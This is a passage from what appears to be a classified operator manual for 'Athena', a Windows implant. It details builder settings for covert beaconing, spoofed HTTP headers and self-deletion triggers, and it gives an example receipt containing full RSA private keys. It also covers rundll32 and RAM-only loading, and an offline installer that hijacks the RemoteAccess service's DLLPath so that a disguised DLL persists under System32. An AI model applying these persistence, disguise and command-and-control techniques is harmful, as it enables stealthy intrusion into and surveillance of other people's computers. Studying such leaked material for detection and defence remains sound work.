default:[]

SECRET//NOFORN 14
SECRET//NOFORN
________________________________________________________________________
new value:

Tasking - Overt State File Path (string)


default:[]
new value:

Tasking - Batch Execution Timeout in seconds (number)


default:[0]
new value:

Tasking - Command Execution Timeout in seconds (number)


default:[0]
new value:

Tasking - Chunk Size - maximum number of bytes in a single block (number)


default:[0]
new value:

Tasking - Max CPU Utilization 0..100 (number)


default:[0]
new value:

Tasking - Max Processing Data Size (number)


default:[50331648]
new value:

Uninstall - Date (YYYY-MM-DDTHH:MM:SS) - UTC


default:[]
new value:

Uninstall - Deadman Delay in seconds (number)


default:[0]
new value:

Uninstall - Beacon failure attempts (number)


default:[0]
new value:

Uninstall - Kill File Path - full file path on target (string)


default:[]
new value:

Install - Target File Name (string)


default:[%SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll]
new value:

Install - Data File Name (string)


default:[%SystemRoot%\System32\CodeIntegrity\ras.cache]
new value:

Install - Restart service with Service Control Manager (SCM) (no,yes)


default:[yes]
new value:

[WIZARD COMPLETE]
Figure 11 - (S//NF) Builder Wizard Review

6.4 (U) Configuration


(U) This section contains the steps with detailed instructions/notes for configuring an implant.

Table 7 - (S//NF) Step-By-Step Implant Configuration Instructions

SECRET//NOFORN 15
SECRET//NOFORN
________________________________________________________________________
Action / Help Text Notes
1 Target - Parent ID (4 chars) The name used for this group of implants.
default:[RnzI]
new value: Name 4 characters in length
2 Target - Child ID (number - dword) The optional name of a specific implant known as a
default:[] child. This option allows the user to define a
new value: specific implant otherwise the system will use the
first 4 bytes of the mac address or a random
number.

Name dword default is mac address (4bytes)


3 Target - dynamic data config type The default location of configuration settings that
(internal,file,registry) change on the target.
default:[internal]
new value: internal - 0 - use data file to store config
--------------------------------------------------------------------- file - 1 - use external file to store config
Target - dynamic data config type
(internal,file,registry) registry - 2 - use registry to store config
default:[internal] Default Hives:
new value: file
HKLM -> HKEY_LOCAL_MACHINE
File - define the full path and file name
NOTE: name can include environment HKCR -> HKEY_CLASSES_ROOT
variables HKCC -> HKEY_CURRENT_CONFIG
Examples: c:\temp\a.txt or c:\
%SystemRoot%\a.txt HKCU -> HKEY_CURRENT_USER
HKUS -> HKEY_USERS
Target - dynamic data config path (file
name or registry value name) Example:
default:[None]
new value: c:\temp\myfile.txt HKCU\SOFTWARE\ATHENA
--------------------------------------------------------------------- or
Target - dynamic data config type
(internal,file,registry) HKLM\SOFTWARE\Microsoft\ATHENA
default:[internal]
new value: registry
The user must enter a subsequent value when
Registry - define the full path to the selecting the file or registry option. See example
registry value entries in blue.
HKLM -> HKEY_LOCAL_MACHINE
HKCR -> HKEY_CLASSES_ROOT
HKCC -> HKEY_CURRENT_CONFIG
HKCU -> HKEY_CURRENT_USER
HKUS -> HKEY_USERS
Examples:
HKLM\SOFTWARE\Microsoft\Value

Target - dynamic data config path (file


name or registry value name)
default:[None]
new value:
HKLM\SOFTWARE\Microsoft\myvalue
4 Beacon - Interval in seconds (number) The default time between beacons.
default:[86400]
new value: Time in seconds

SECRET//NOFORN 16
SECRET//NOFORN
________________________________________________________________________
Action / Help Text Notes
5 Beacon - Jitter as a percentage of Interval The default jitter used to randomize the beacon time
0..100 (number) based on a percentage of the interval time. (NOTE:
default:[5] 0 disables jitter)
new value:
Percentage (0..100)
6 Beacon - Boot Delay in seconds (number) The default boot delay for the implant. The amount
default:[60] of time to wait after a reboot.
new value:

Time in seconds
7 Beacon - Hibernation Delay in seconds The default hibernation delay for the implant. The
(number) amount of time to wait before the first beacon will
default:[60] be processed.
new value:

Time in seconds
8 Beacon - Tasking Delay in seconds (number) The default tasking delay for all commands
default:[60] processed.
new value:

Time in seconds
9 Beacon - Domains (LP Server DNS hostname or The default domain name (hostname or IP address)
IP Addresses separated by a comma) of the Listening Post to be used for beaconing.
default:[None]
new value: abc.com Time in seconds
10 Beacon - Port (number) The default port number used to beacon from the
default:[443] target.
new value:
Port number(0..65535)
11 Beacon - Proxy Port NOTE:0=disable (number) The default proxy port for processing beacons on
default:[0] the target.
new value:
Port number(0..65535)
12 Beacon - User Agent String (string) The default user agent string placed in the header
default:[Mozilla/5.0 (Windows NT 6.3; when processing beacons on the target.
Trident/7.0; rv:11.0)]
new value: String
13 Beacon - URL Path for LP (string) The default URL path on the server that is used for
default:[/] processing beacons on the target.
new value:
WARNING: This value MUST be in the
DATA_URLS field in the config.json file on the
LP.
String
14 Beacon - Accept Header (string) The default accept header in the packet when
default:[text/html,application/ processing beacons on the target.
xhtml+xml,application/
xml;q=0.9,*/*;q=0.8]
new value: String
15 Beacon - Accept Language Header (string) The default accept language header in the packet
default:[en-US,en;q=0.5] when processing beacons on the target.
new value:
String

SECRET//NOFORN 17
SECRET//NOFORN
________________________________________________________________________
Action / Help Text Notes
16 Beacon - Accept Encoding Header (string) The default accept encoding header in the packet
default:[application/octet-stream] when processing beacons on the target.
new value:
WARNING: Changing this value may cause
unexpected results when processing data on the
target.
String
17 Beacon - IE Proxy Address (string) The default IE Proxy Address used to proxy beacon
default:[] communication on the target.
new value:
String
18 Beacon - WPAD Proxy Address (string) The default WPAD Proxy Address used to proxy
default:[] beacon communication on the target.
new value:
String
19 Tasking - Overt State File Path (string) The default overt state file path used to store state
default:[] information during processing of commands.
new value: (NOTE: when empty no state information is
stored on target). This directory will store state
files (random file names) of current processing
information.
String full path
20 Tasking - Batch Execution Timeout in The default batch execution timeout is used to
seconds (number) cancel processing of long running batches.
default:[0]
new value: Time in seconds
21 Tasking - Command Execution Timeout in The default command execution timeout is used to
seconds (number) cancel processing of long running commands.
default:[0]
new value: Time in seconds
22 Tasking - Chunk Size - maximum number of The default chunk size of a packet sent from the
bytes in a single block (number) target to the Listening Post.
default:[0]
new value: Number in bytes
23 Tasking - Max CPU Utilization 0..100 The default maximum CPU utilization used by the
(number) system while processing commands.
default:[0]
new value: Percentage of system usage(0..100)
24 Tasking - Max Processing Data Size (number) The default maximum processing data size of the
default:[50331648] data to process on target.
new value:
Number in bytes
25 Uninstall - Date (YYYY-MM-DDTHH:MM:SS) The default time and date of the automatic self-
UTC deletion of the target executable.
default:[]
new value: Date (YYYY-MM-DDTHH:MM:SS)
26 Uninstall - Deadman Delay in seconds The default delay that the target will self-delete
(number) after not receiving a valid beacon.
default:[0]
new value: Time in seconds
27 Uninstall - Beacon failure attempts The default number of beacon failure attempts to
(number) force a self-delete of the target executable.
default:[0]
new value: Number

SECRET//NOFORN 18
SECRET//NOFORN
________________________________________________________________________
Action / Help Text Notes
28 Uninstall - Kill File Path - full file path The default kill file name that is used to force a
on target (string) self-delete when the file is present on the target
default:[] system.
new value:
File Name
29 Install - Target File Name (string) The default file path used for the host target file.
default:[%SystemRoot%\System32\
Microsoft\Crypto\RAS\ File Name
iprcache.dll]
new value:
30 Install - Data File Name (string) The default file path used for the data file on the
default:[%SystemRoot%\System32\ target system.
CodeIntegrity\ras.cache]
new value: File Name

31 Install - Restart service with Service The option to restart the service after install.
Control Manager (SCM) (no,yes) Otherwise, the tool will be installed and will not
default:[yes] start until next reboot or restart of the host service.
new value:
Yes/No

6.5 (U) Output


(U) The Builder produces multiple output components. All receipts will be placed in the receipts
folder. Each build will be in its own directory and contain all target specific files.

6.5.1 (U) Output Receipt File


(S//NF) The Builder outputs an XML receipt file containing all the configuration settings for a
target. The receipt file is required when tasking implants and parsing output from a target. The
receipt file name will include the parent id as well as the child id if one exists (e.g.
test_ABCD0064_receipt.xml). Figure 12 shows an example of the receipt file format.
<?xml version="1.0" encoding="UTF-8"?>
<ATHENA>
<CLIENT_KEY>
<PUBLIC_KEY>-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAwJjJBMrqVw3insRnvkGp
b1ySeVzBU2SK38g8i1JpZXELqzNzmrXKjg23A9H24hojPHnANzruDe13qJY+0vpe
wO7wbFWOCr5aJ2ETcDK+N601URMTsjy8k7uNasPtI+ffzuiCHvDYvoLtDORjAy45
zrwoPozzVlX01YEfc3nQMZ7YRmUZxNlkAq5nXoZuUeBzNpzYAEA8h84t2/HpFb+H
+1RYWIf7ZvJTadLHcw+8PsCX06Gr+HZRpi/c9CEakzhVfIwQg4rPuXsMDbP0D38k
IH09oP/yd73EJT4wO6jddtFWvXdOI/HWOcb8GXkpoPmcVP0jeaVOwE1l+nYddAou
DKMzaYivpeHsdsA2RjnwlcIFJKEHmug7ga0+4Xr7PGv/B8tWmCyLJOFnTB3xTiJ6
AQ5+Fgej6I/zg1o9XVs37kNHBdxzkia6XmMapfezKFhL06IQtTzV383IU28bouaC
QamGy009wFs0ZmjKVCxwsJoMNDWx/6iSg4diLu6Ju4jgsolG9SaOXur4pbOg8hFl
z1lvSC5FBD3OekpQNIsfPWslHfNa0Mvw1g+CftEKV1EIwv+KCm0aNzVi3vf+LpHu
jKN9go9oqyHK0UY2G1otCh+UlyLJJ71vHnJZ7jaMQLG3iYKmWN/PYz0svD50cEW9
wK31H27uRLVBZYGQ5815M5cCAwEAAQ==
-----END PUBLIC KEY-----
</PUBLIC_KEY>
<PRIVATE_KEY>-----BEGIN RSA PRIVATE KEY-----
MIIJKAIBAAKCAgEAwJjJBMrqVw3insRnvkGpb1ySeVzBU2SK38g8i1JpZXELqzNz
mrXKjg23A9H24hojPHnANzruDe13qJY+0vpewO7wbFWOCr5aJ2ETcDK+N601URMT
sjy8k7uNasPtI+ffzuiCHvDYvoLtDORjAy45zrwoPozzVlX01YEfc3nQMZ7YRmUZ
xNlkAq5nXoZuUeBzNpzYAEA8h84t2/HpFb+H+1RYWIf7ZvJTadLHcw+8PsCX06Gr
+HZRpi/c9CEakzhVfIwQg4rPuXsMDbP0D38kIH09oP/yd73EJT4wO6jddtFWvXdO
I/HWOcb8GXkpoPmcVP0jeaVOwE1l+nYddAouDKMzaYivpeHsdsA2RjnwlcIFJKEH
mug7ga0+4Xr7PGv/B8tWmCyLJOFnTB3xTiJ6AQ5+Fgej6I/zg1o9XVs37kNHBdxz
kia6XmMapfezKFhL06IQtTzV383IU28bouaCQamGy009wFs0ZmjKVCxwsJoMNDWx
/6iSg4diLu6Ju4jgsolG9SaOXur4pbOg8hFlz1lvSC5FBD3OekpQNIsfPWslHfNa
0Mvw1g+CftEKV1EIwv+KCm0aNzVi3vf+LpHujKN9go9oqyHK0UY2G1otCh+UlyLJ

SECRET//NOFORN 19
SECRET//NOFORN
________________________________________________________________________
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
-----END RSA PRIVATE KEY-----
</PRIVATE_KEY>
</CLIENT_KEY>
<TASKING>
<COMMAND_EXECUTE_TIMEOUT>10</COMMAND_EXECUTE_TIMEOUT>
<STATE_FILE_PATH>.\STATE_FILES</STATE_FILE_PATH>
<MAX_CPU_UTILIZATION>40</MAX_CPU_UTILIZATION>
<MAX_PROCESSING_DATA_SIZE>1000000</MAX_PROCESSING_DATA_SIZE>
<MAX_CHUNK_SIZE>0</MAX_CHUNK_SIZE>
<BATCH_EXECUTION_TIMEOUT>123</BATCH_EXECUTION_TIMEOUT>
</TASKING>
<INSTALL>
<RESTART_SERVICE>1</RESTART_SERVICE>
<TARGET_FILE_NAME>%SystemRoot
%\System32\Microsoft\Crypto\RAS\iprcache.dll</TARGET_FILE_NAME>
<ORIGINAL_FILE_NAME>%SystemRoot%\System32\iprtrmgr.dll</ORIGINAL_FILE_NAME>
<DATA_FILE_NAME>%SystemRoot%\System32\codeintegrity\ras.cache</DATA_FILE_NAME>
</INSTALL>
<UNINSTALL>
<KILL_FILE_PATH></KILL_FILE_PATH>
<DEAD_MAN_DELAY>0</DEAD_MAN_DELAY>
<BEACON_FAILURES>0</BEACON_FAILURES>
<DATE_AND_TIME></DATE_AND_TIME>
</UNINSTALL>
<BEACON>
<BOOT_DELAY>0</BOOT_DELAY>
<DOMAINS>10.3.2.56</DOMAINS>
<PORT>443</PORT>
<JITTER>0</JITTER>
<USER_AGENT_STRING>Mozilla/5.0 (Windows NT 6.3; Trident/7.0;
rv:11.0)</USER_AGENT_STRING>
<ACCEPT_STRING></ACCEPT_STRING>

SECRET//NOFORN 20
SECRET//NOFORN
________________________________________________________________________
<INTERVAL>5</INTERVAL>
<TASKING_DELAY>0</TASKING_DELAY>
<PROXY_PORT>0</PROXY_PORT>
<HIBERNATION_DELAY>0</HIBERNATION_DELAY>
<ACCEPT_LANG_STRING></ACCEPT_LANG_STRING>
<IE_PROXY_ADDRESS></IE_PROXY_ADDRESS>
<URL_PATH>/octopus/</URL_PATH>
<ACCEPT_ENCODING_STRING></ACCEPT_ENCODING_STRING>
<WPAD_PROXY_ADDRESS></WPAD_PROXY_ADDRESS>
</BEACON>
<SERVER_KEY>
<PUBLIC_KEY>-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA4GUhkIiQtZTYYGiz3ieh
CyWOHz5KM5YbYrvkASsImNZrPem2jWBsHPBzimnrsziVPezxkRCZORBlMeThJgPA
/RAh1udtKL0x5zW6hrxuibtwW+NJSZpigqVut6gMqrtiCrhtYOp17wq4+xyQtZJ/
D0yl2w8umsFMSLDW35LaS0Lg0CuuvhjanUfW61npOpl1jpfeOEW25b/VYlwrgjcd
NdB48np1fBOe0MZLwuVMhVp2mv05jGjMdaBVwxdOlPt31ryZ/40KlfvucBqURhZp
yTa9VWorCFmTzBq6+7ZZv71PhxqOIm1+5jgROi8U95YnVTlop82mRj5BCmoZNX6p
212ZoG5skRHsMP66ohNK5qyW/qk4CnDxqKQprkdIN7/qKJ+rQ732WY6d3f407nW3
fv01qGb+66J2nIXmkZ2mdE8NIY6FxygfMKkqnMpcNfiILK1VSJYDY/LWTNNdYWnK
Q8gSBmV0klFx7BefANOY6luq0/7LzkcxOYz7AJDwXpCDVx0D/Eyc7X1K8EAX+jUY
iBv/bAjNjH6862DgR16yqzb802P4DzTn2oVVdpg8QOg52Sca7ZrSjpAwFg9zBq7K
U3+2xz7KvyZLxlfkNIpXFQRernuqVlpz057KqeI8KZpBNIlBYbDFAR/8TcXZxvqP
d7Xdpx51gzCsyos/LlB1Mq8CAwEAAQ==
-----END PUBLIC KEY-----
</PUBLIC_KEY>
<PRIVATE_KEY>-----BEGIN RSA PRIVATE KEY-----
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

SECRET//NOFORN 21
SECRET//NOFORN
________________________________________________________________________
9KQOrFATxmyIt0kXbWXQ1yNmRKnybXAWHleAzCj0qrKf7CtdRSPOB7WetwTH5ork
7FYwjPTWEr+hsDZmKXOuU3XvlCByNbKe7M2CilseCcqpzhmQDghH3lIAp+BTkwYL
zD5Z5IakrmXE+NmRafPUUZnEhmi1yNuinPeTlrULBbh3X6W9mvJQcOSFZ4HkaE5W
nFVG1GYYAISzBqgk4aALrupQGzshdQgvEcfOeEZuYUxRaqeQGvZS7z/cDQ/10Z7J
3NN4NMOj7VGMNj/tcW5ScEba5ZbZwnPZWiDChHTblOpkbnLKhb/o1898RFaEryg=
-----END RSA PRIVATE KEY-----
</PRIVATE_KEY>
</SERVER_KEY>
<SOURCE>
<MASK>4D324A24C2EB88548A760390ED9DEAB6</MASK>
</SOURCE>
<TARGET>
<CHILD_ID>0xABCD0064</CHILD_ID>
<DYN_CONFIG_TYPE>0</DYN_CONFIG_TYPE>
<PARENT_ID>test</PARENT_ID>
</TARGET>
</ATHENA>

Figure 12 - (S//NF) Example Receipt File - XML

6.5.1 (U) Output Target Files


(S//NF) The Builder outputs files that are used to manage the target implant. Figure 13 shows
the listing of the files included in a standard target configuration.
<SYSTEM_EXPORT_PATH>
builder.log - output log from the Builder
test_ABCD0064_receipt.xml - target receipt file

installer - NOD spec installation files
installer_x64.dll - 64 bit installation dll
installer_x86.dll - 32 bit installation dll

offline
linux - linux offline installation files
functions.sh
linux.sh
reged.static - registry editor
target_x64.dat
target_x64.dll
target_x64.ini
target_x86.dat
target_x86.dll
target_x86.ini

windows - windows offline installation files
offline_x64.exe - installer for 64 bit recovery OS
offline_x86.exe - installer for 32 bit recovery OS
target.ini - configuration for specific implant
target_x64.dat
target_x64.dll
target_x86.dat
target_x86.dll

ram_only - NOD spec ram-only version of Athena
ram_only_x64.dll - 64 bit run dll
ram_only_x86.dll - 32 bit run dll
Figure 13 - (S//NF) Builder Output Files
Note
(S//NF) Athena's Builder has a --debug option that will build
all the intermediate files and place them in a debug directory
in the Builder output directory.

SECRET//NOFORN 22
SECRET//NOFORN
________________________________________________________________________
7. (U) Implant Installation
7.1 (U) Overt Installation on Disk Mode
(S//NF) Once the target is created with the Builder, the implant can be installed with the Installer
DLL. The specific name can be changed when deploying using a DLL file.
Installer_x64.dll 64 bit installation DLL
Installer_x86.dll 32 bit installation DLL
(S//NF) Another tool is required to load the Installer onto the system. For testing
purposes only, rundll32.exe (with Administrator access) can be used as the loader tool.
However, testing the Installer using rundll32.exe may be flagged by the PSP (see
discussion in Section 10.2).
Usage: rundll32 installer_x64.dll,#2
Note
(S//NF) The Shellterm entry point is at ordinal 1 and the
rundll32 entry point is at ordinal 2.

7.2 (U) Random Access Memory-Only (RAM-Only) Mode


(S//NF) Once the target is created with the Builder, the implant can be run in memory with the
ram_only DLL. The specific name can be changed when deploying via a DLL file.
ram_only_x64.dll 64 bit ram-only DLL
ram_only_x86.dll 32 bit ram-only DLL
(S//NF) Another tool is required to run the RAM-only instance on a system. For testing,
rundll32.exe can be used as the loader tool.
Usage: rundll32 ram_only_x64.dll,#2

7.3 (U) Implant Offline Installation


(S//NF) The Offline Installer sets up Athena/Hera on an unbooted computer and updates the
computers registry. The Installer can be run from a remote operating system by using a Linux
boot disk (e.g., Ubuntu v14.04) or a Windows Installation disk and the Recovery Console.

7.3.1 (U) Offline Windows Installation


(S//NF) The Offline Windows Installer requires a Windows distribution that has an active
Recovery Console. The bitness of the Windows distribution does not affect the installation but
the correct version of the Installer must be run in the console -- the Offline Installer version must
match the bitness of the Windows Recovery Console. Either installation will resolve the correct
target installation files.
offline_x64.exe for use with the 64 bit Recovery Console
offline_x86.exe for use with the 32 bit Recovery Console

SECRET//NOFORN 23
SECRET//NOFORN
________________________________________________________________________

>offline_x64.exe

OFFLINE::Dec 21 2015
USAGE: offline <optional windows path>

Searching C:
Searching D:
Searching X:

Update options:

1) C:\Windows (x64)
2) D:\Window10 (x64)

Select instance to update (q or x to quit):2

Processing: D:\Window10 (x64)


>> Reg: SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip
DLLPath -> %SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll
Start -> 0x02
Type -> 0x20
>> Reg: SYSTEM\CurrentControlSet\Services\RasMan
Start -> 0x02
Type -> 0x20
>> Reg: SYSTEM\CurrentControlSet\Services\SstpSvc
Start -> 0x02
Type -> 0x20
>> Source:d:\Athena\builder_output\test_ABCD0064\offline\windows\target_x64.dll
Dest: D:\Window10\system32\microsoft\crypto\ras\iprcache.dll
>> Source:d:\Athena\builder_output\test_ABCD0064\offline\windows\target_x64.dat
Dest: D:\Window10\system32\codeintegrity\ras.cache
SUCCESS
Figure 14 - (S//NF) Windows Offline Installer
(S//NF)Figure 14 shows the output from an Offline Installer session. The installation script will
scan all mounted disks and determine potential Windows versions. A list will be displayed and
the user can select the specific instance to install.
Note
(S//NF) The offline tool allows alternate paths to be included
on the command line as arguments.
USAGE: offline.exe <optional windows path>

7.3.1 (U) Offline Linux Installation


(S//NF) The Offline Linux Installer requires the components and versions listed in Table 8
below. The Ubuntu v14.04 installation media will contain the correct versions of required
software for the offline Linux installation.

SECRET//NOFORN 24
SECRET//NOFORN
________________________________________________________________________
Table 8 - (S//NF) Required Offline Installer Components
Component Version
Utility
bash 4.3.8 or greater
sed 4.2.2
od 8.2.1 or greater
reged.static 0.1 140201(included in the Athena distribution)
